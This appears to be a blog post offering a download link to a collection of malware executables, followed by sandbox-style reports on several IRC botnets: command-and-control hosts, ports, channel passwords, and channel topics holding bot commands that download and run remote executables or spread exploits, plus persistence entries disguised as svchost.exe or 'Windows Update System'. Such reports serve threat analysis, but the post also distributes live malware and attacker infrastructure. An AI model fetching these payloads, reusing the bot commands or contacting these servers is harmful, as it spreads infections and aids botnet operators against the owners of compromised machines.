30 MB of exe files from different malware
Here is a download link for everyone who likes to spend some time inside exe files with malware signatures. Download: http://d4fdc870.dyo.gs
efy2.internetdsl.tpnet.pl (botnet hosted in Poland, Krakow, static IP)
Remote Host, Port Number:
212.97.132.151 80
95.211.84.41 80
83.15.2.2 31092
NICK US|computername
USER yoxuruho UNIX UNIX :username
JOIN #all#
Resolved : [serv01.colo.owned.hu] To [83.15.2.2]
Resolved : [serv01.colo.owned.hu] To [83.233.167.103]
Resolved : [serv01.colo.owned.hu] To [81.219.80.126]
Resolved : [serv01.colo.owned.hu] To [196.46.191.100]
Other details
* The following ports were open in the system:
Port Protocol Process
1055 TCP ...
bean.F-QACS.INF (botnet hosted in United Kingdom, Knowinservers Ltd)
bean.F-QACS.INFO:5337
178.162.175.63:5337
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed
HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Windows Service Host C:\Documents and Settings\Administrator\Application Data\svchost.exe
Hosting info: http://whois.domaintools.com/178.162.175.63
a.botsgod.info (VirUs aka lamer botnet hosted in France, Gandi)
a.botsgod.info 4949
##A##
Topic is ‘!j #1,#2’ Set by XxX on Wed Dec 22 07:14:52
* Topic is ‘!NAZEL http://dvdmediaplus.in/install.48755.exe s9d8y5.exe 1’ Set by xXx on Wed Dec 22 20:03:17
Topic is ‘!NAZEL http://promofile.info/setup715.exe SDSDSD.exe 1’ Set by XxX on Wed Dec 22 07:18:12
a.botsgod.info ip: 95.142.173.4
a.botsgod.info ip: 95.142.173.176
Hosting info: http://whois.domaintools.com/95.142.173.4
aaaaaaaa.schooluni.us (butterfly bot hosted in Russian Federation, Vline Ltd)
aaaaaaaa.schooluni.us:7196
PASS laorosr
Channel#dpi Channel#!
NICK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is ‘.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’ Set by nonSTOPspread66 on Sat ...
serv01.colo.owned.hu (botnet hosted with Egypt, Afrinic)
Remote Host, Port Number:
196.46.191.100 31092
212.97.132.151 80
95.211.84.41 80
NICK US|computername
USER duiizaui UNIX UNIX :username
JOIN #all#
JOIN #US
Now talking in #all#
Topic On: [ #all# ] [ zg8w2CSUq2uia0QJlZCB54+bx1ORaIYwuWdNWqLiaRItRqdzrOHaoL/ZlA/RBgykhuYXvz0p+UCC5AowzlgNggVoLqkXzM+L2HR5WjCPVOsWHS21OdGLfnuALxORajUP/gdM/hRbMXB+mBM995oqart5JdolC5OI ]
Modes On: [ #all# ] [ +smntMu ]
Resolved : [serv01.colo.owned.hu] To [83.15.2.2]
Resolved : [serv01.colo.owned.hu] To [83.233.167.103]
Resolved : [serv01.colo.owned.hu] To ...
adpool-3.net (malware hosted with hosting.ua)
DNS Lookup (Host Name, IP Address): www.microsoft.com 65.55.12.249 dell-d3e62f7e26 10.1.7.2 10.1.1.1 10.1.1.1 wpad adpool-3.net adpool-3.net 178.86.0.144
UDP Connections
Opened listening TCP connection on port: 1515
Opened listening TCP connection on port: 6135
Download URLs
http://178.86.0.144/cgi-bin/npr/web/t_riz.cgi?magic=151561350006&ox=2-5-1-2600&tm=60&id=-1&cache=0880350166 (adpool-3.net)
Outgoing connection to remote server: www.microsoft.com port 80
Outgoing connection to remote server: adpool-3.net TCP port 80
Registry Changes by ...
rolando9.clanhosters.org (malware hosted with United States, Dallas, Theplanet.com Internet Services Inc)
DNS Lookup (Host Name, IP Address): dell-d3e62f7e26 10.1.14.2 10.1.1.1 10.1.1.1 wpad stuypel.free.bg stuypel.free.bg 188.40.80.188 rolando9.clanhosters.org rolando9.clanhosters.org 174.121.1.58 sharo.fileave.com sharo.fileave.com 64.62.181.43
Opened listening TCP connection on port: 12380
Download URLs
http://188.40.80.188/Thumbsx.db (stuypel.free.bg)
http://64.62.181.43/0234254.exe (sharo.fileave.com)
Outgoing connection to remote server: stuypel.free.bg TCP port 80
Outgoing connection to remote server: rolando9.clanhosters.org TCP port 80
Outgoing connection to remote server: ...
synyoshi.dyndns.info (botnet hosted with United States, Walnut, Psychz Networks)
– DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
synyoshi.dyndns.info DNS_TYPE_A 173.224.219.21 YES udp
173.224.219.21:6667
Nick: n[XP-AUT]176146
Username: 8977
Joined Channel: #ganja#
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Update System” = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Windows Update System” = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “Windows Update System” = C:\Dokumente und ...